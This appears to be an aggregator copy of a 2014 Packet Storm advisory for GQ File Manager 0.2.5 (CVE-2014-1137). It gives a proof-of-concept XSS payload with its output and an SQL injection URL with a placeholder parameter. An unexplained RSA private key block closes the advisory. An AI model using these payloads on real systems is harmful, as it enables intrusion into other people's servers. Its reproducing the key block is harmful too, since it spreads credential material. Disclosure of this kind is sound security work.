GQ File Manager 0.2.5 Cross Site Scripting / SQL Injection

🗓️ 20 Dec 2014 00:00:00Reported by Taurus OmarType

packetstorm🔗 packetstormsecurity.com👁 25 Views

GQ File Manager 0.2.5 Cross Site Scripting / SQL Injection Vulnerabilit

Reporter	Title	Published	Views	Family All 14
0day.today	Codiad 2.4.3 Cross Site Scripting / Local File Inclusion Vulnerabilities	20 Dec 201400:00	–	zdt
0day.today	GQ File Manager 0.2.5 Sql Injection / Cross Site Scripting Vulnerabilities	20 Dec 201400:00	–	zdt
CVE	CVE-2014-1137	10 Jan 201500:00	–	cve
Cvelist	CVE-2014-1137	10 Jan 201500:00	–	cvelist
Exploit DB	GQ File Manager 0.2.5 - Multiple Vulnerabilities	19 Dec 201400:00	–	exploitdb
Exploit DB	Codiad 2.4.3 - Multiple Vulnerabilities	19 Dec 201400:00	–	exploitdb
exploitpack	Codiad 2.4.3 - Multiple Vulnerabilities	19 Dec 201400:00	–	exploitpack
exploitpack	GQ File Manager 0.2.5 - Multiple Vulnerabilities	19 Dec 201400:00	–	exploitpack
NVD	CVE-2014-1137	10 Jan 201500:59	–	nvd
Packet Storm	Codiad 2.4.3 Cross Site Scripting / Local File Inclusion	20 Dec 201400:00	–	packetstorm

` -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
INDEPENDENT SECURITY RESEARCHER   
PENETRATION TESTING SECURITY  
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
  
  
# Exploit Title: GQ File Manager - Sql Injection - Cross Site Scripting Vulnerability's   
# Date: 19/12/2014  
# Url Vendor: http://installatron.com/phpfilemanager  
# Vendor Name: GQ File Manager   
# Version: 0.2.5   
# CVE: CVE-2014-1137  
# Author: TaurusOmar   
# Tiwtter: @TaurusOmar_  
# Email: [email protected]  
# Home: overhat.blogspot.com  
# Tested On: Bugtraq Optimus  
# Risk: High  
  
Description  
GQ File Manager is a lightweight file manager that enables files to be uploaded to and downloaded from a server directory. GQ File Manager is great for creating and maintaining a simple cloud-based repository of files that can be accessed from anywhere on the Internet.   
  
------------------------  
+ CROSS SITE SCRIPTING +   
------------------------  
# Exploiting Description - Created new file example:("xss.html")in the document insert code xss  
  
Input:  
"><img src=x onerror=;;alert('XSS') />  
Output:   
<br />  
<b>Warning</b>: fread() [<a href='function.fread'>function.fread</a>]: Length parameter must be greater than 0 in <b>/home/u138790842/public_html/gp/incl/edit.inc.php</b> on line <b>44</b><br />  
"><img src=x onerror=alert("xss");>  
  
#P0c  
"><img src=x onerror=;;alert('XSS') />  
  
#Proof Concept  
http://i.imgur.com/cjIvR5l.jpg  
  
  
------------------------  
+ Sql Injection +  
------------------------  
# Exploiting Description - The Sql Injection in path created a new file.   
  
#P0c  
http://site.com/GQFileManager/index.php?&&output=create&create=[sql]  
  
#Proof Concept  
http://i.imgur.com/IJZoDVt.jpg  
  
  
  
-----BEGIN RSA PRIVATE KEY-----  
MIICXQIBAAKBgQD995aYvrD2mK2fwwQr3FoAAprFLfMAiwR8cQUZW2XWDUSNJdvl  
Mq/1qym16+Yx7AVmXbsdCzqV/zeX+VUg6fUUWFwzNru6akjOlEHnSpNPxfJaCOEi  
2AFovRie8LJyXtmXf1VFVU7l33/OBUsGJAUa2H4bR8ChTUffSHqkoFLE5wIDAQAB  
AoGBANJgFc/RpqWfM7Pzx7DNh4AaqDpOJc19Wun6dU7b9y+pLe/+PHlP05Kdhp+8  
GaOg75gsbKNSeeVm1JZ/Y5UwOGJLn06W8PaBgkNG+b6tv9iRV7jSubEscwfGOXSX  
X5Hi9XP02MOrEsqOcgl6Xqpf8//fauhem8a4/iftk2hG3ngBAkEA/4C5QQePSOz/  
WyypDfUC5Nr5h32zq5bvRY++v7ydzeSRQD8uri66zZuz0gGTzjGdyBUb2OuTDT4R  
8RUcW1x9QQJBAP52GYGDg/+EE7ABX4zT/ZOHJScjlezxbwLiTsvWoESRUrQftLOL  
Wvl2IpeYpWvKIjTzyb5WH+IBWPFpM6RfsCcCQQDnqrDOrOsXhYSYB+uVMyYXmhEM  
8EYb/HQhj4+2THCNQoUNSvyphMduLJKkhTeei1B0HeetDRS9uh0Mika29CrBAkAM  
BVg/Hg9mSr8DWY1CAeHAzmma57t1bhJoeHhweLspghP+HmFS+gpaLpKDxtpJtUrY  
ZYvqSfdHnfitruKZqUuRAkAti8p7b53+cFSm14WPNtdhJQnxniUcSKBtNm5ExO7J  
X54eZI4iddc9xnP4rySfwz933FhMRF9Eh3gPUYAPBpp/  
-----END RSA PRIVATE KEY-----  
`

20 Dec 2014 00:00Current

0.5Low risk

Vulners AI Score0.5